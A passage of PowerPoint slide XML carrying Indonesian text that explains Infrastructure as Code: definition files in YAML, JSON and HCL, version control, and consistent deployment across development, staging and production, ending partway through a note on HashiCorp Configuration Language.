              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>definisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. File-file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. File-file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>definisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> YAML, JSON, dan HCL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>HashiCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Configuration Language). File-file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diinginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>definisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intervensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>File-file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakkonsistenan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>timbul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pementasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direproduksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. HCL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>HashiCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Configuration Language) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>HashiCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Infrastructure as Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. HCL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
